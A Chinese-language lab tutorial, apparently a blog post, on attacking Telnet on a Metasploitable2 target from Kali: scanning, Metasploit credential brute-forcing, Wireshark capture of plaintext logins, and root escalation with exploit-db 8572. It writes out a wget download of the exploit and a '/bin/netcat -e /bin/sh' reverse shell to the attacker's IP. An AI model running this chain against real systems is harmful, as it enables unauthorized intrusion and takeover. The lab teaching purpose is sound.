4.6、漏洞利用-Telnet

目录

4.6、漏洞利用-Telnet

4.6.1、telnet暴力破解

1、telnet介绍

2、telnet版本介绍

3、telnet密码破解

4、telnet登录测试

4.6.2、telnet认证过程抓包分析

1、Telnet客户端连接telnet服务器

2、Tenet明文密码传输

4.6.3、telnet登录提权

1、msf登录telnet

2、msf连接shell下载exp

3、设置kali nc监听

4、编译执行exp,获取root


 

4.6、漏洞利用-Telnet

4.6.1、telnet暴力破解

1、telnet介绍

Telnet服务,即远程终端协议服务,使用明文传输用户的所有内容,具有安全隐患。Telnet服务默认使用23端口

2、telnet版本介绍

攻击机kali:192.168.12.128

靶机metasploitable2:192.168.12.129

(1)使用nmap获取

nmap 192.168.12.129
nmap -p 23 -sV 192.168.12.129

4f686cdd162462d7af4bd9a53f7c9d32.png3f3dda453f5c452201087b062269264d.png

 

(2)使用metasploit

use auxiliary/scanner/telnet/telnet_version

show options

set rhosts IP

run

成功建立连接后可获得telnet的账号和密码

2d36ea3af02945ac159e7fa025430ca5.png7fa9321f4b89b341ffe3ce690a6ef321.png75af5278fff24a2d1fd67977a565b51d.png

 

 

3、telnet密码破解

search telnet

use auxiliary/scanner/telnet/telnet_login

show options

set rhosts IP
set user_file /路径
set pass_file /路径
//这里直接用msfadmin/msfadmin登录不再演示

run

1ea643824ab715a2bde7750d9f0048c0.png2a1bdb71a10c33d0ee145c8991d723a7.pngc3640d0239f9ada66d94e7b5a9255676.png

 

 

4、telnet登录测试

使用破解好的会话连接telnet,并执行对应的命令

使用sessions -l 列举建立的会话

使用session -i id 使用对应的会话

5118ae2a6385836d6d9c57305f02220e.pngc13d17f798fe3591a0970fd5499e2480.png

 

5、获取meterpreter shell

 

 

4.6.2、telnet认证过程抓包分析

1、Telnet客户端连接telnet服务器

Windows下开启Telnet客户端,连接telnet服务,默认下该服务关闭。

控制面板—>程序和功能—>telnet client

Dos命令框下使用telnet启动客户端,?命令查看帮助。

a203463e374bf0c4c9a7474f6b5fc05f.pngab615b388dbbddd2f046a0a7ddc8bdf5.png7d68341c397ad3f5382d456f9dc7748c.png

 

2、Tenet明文密码传输

Wireshark抓包分析

对比上述登录命令即可明显得出Telnet使用明文传输内容。

3c741ddc8a9fcadadd959bebbef81ff9.png991770690a07be79b249d523a86232f7.png011a0096e71f09b161310751459a542d.png

 

4.6.3、telnet登录提权

登录的目的在于提权,掌握系统root权限,具体流程

登录telnet服务
使用session -i连接bash shell
攻击机准备提权文件
通过bash shell将攻击机上的提权文件下载到靶机上
攻击机开启端口监听
在shell中执行,并定义反弹shell执行地址
连接shell,获得root权限

1、msf登录telnet

832fd65e37393a21071e3b5587f9a0aa.png

 

2、msf连接shell下载exp

攻击机准备提权文件
由于靶机无法直接下载exp,所有必须先将提权文件下载到kali中,修改文件名及后缀,开启kali的http服务,然后从连接的shell中将exp从kali中下载到靶机中。

值得注意的是默认的传输目录是/var/www/html/

另外,下载的exp文件需要在其末尾加入新行,不然后续执行的时候会报no newline的error。

service apache2 start    开启http服务

service apache2 status    查看http状态

cd /var/www/html/    切换到默认传输目录

wget http://www.exploit-db.com/download/8572    使用wget下载exp文件到kali

mv 8572 test.c    修改后缀名

5b4b1d9cd9c179bae68897a0adde77c5.png1eea0264b15f2fe28646d64b125f947f.png

 

msfadmin@metasploitable:~$ wget "http://192.168.12.128/test.c"
通过shell下载exp到靶机

85a18e39afb0c5a5bf628880ee604c16.png

 

 

3、设置kali nc监听

nc -lvp 6666
-l启动监听模式 
-v详细的分析内容
-p指定监听端口

c91919328e7a5375a3e4b07a835f2a03.png

 

4、编译执行exp,获取root

msfadmin@metasploitable:~$ gcc test.c -o exploit    编译C程序

msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run    定义执行环境至/run

msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 192.168.12.128 6666' >> /tmp/run

msfadmin@metasploitable:~$ cat /tmp/run    验证run配置

msfadmin@metasploitable:~$ ps aux | grep udev    查看pid

msfadmin@metasploitable:~$ ./exploit 2747    执行root权限id-1

 执行第一条命令的时候提示在tes.c文件的末尾没有newline,所有要在文件中添加以后再重新下载。

0482c291df9d95f56c60063371c092ee.png

添加空行重新下载后继续。

00db4d6b20962e337c720022c60386c6.png

 

id    权限id

whoami    我是谁

返回监听端口,结果表明提权成功

064ac5e247979750a3d3386a281b1bde.png

 

 

 

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值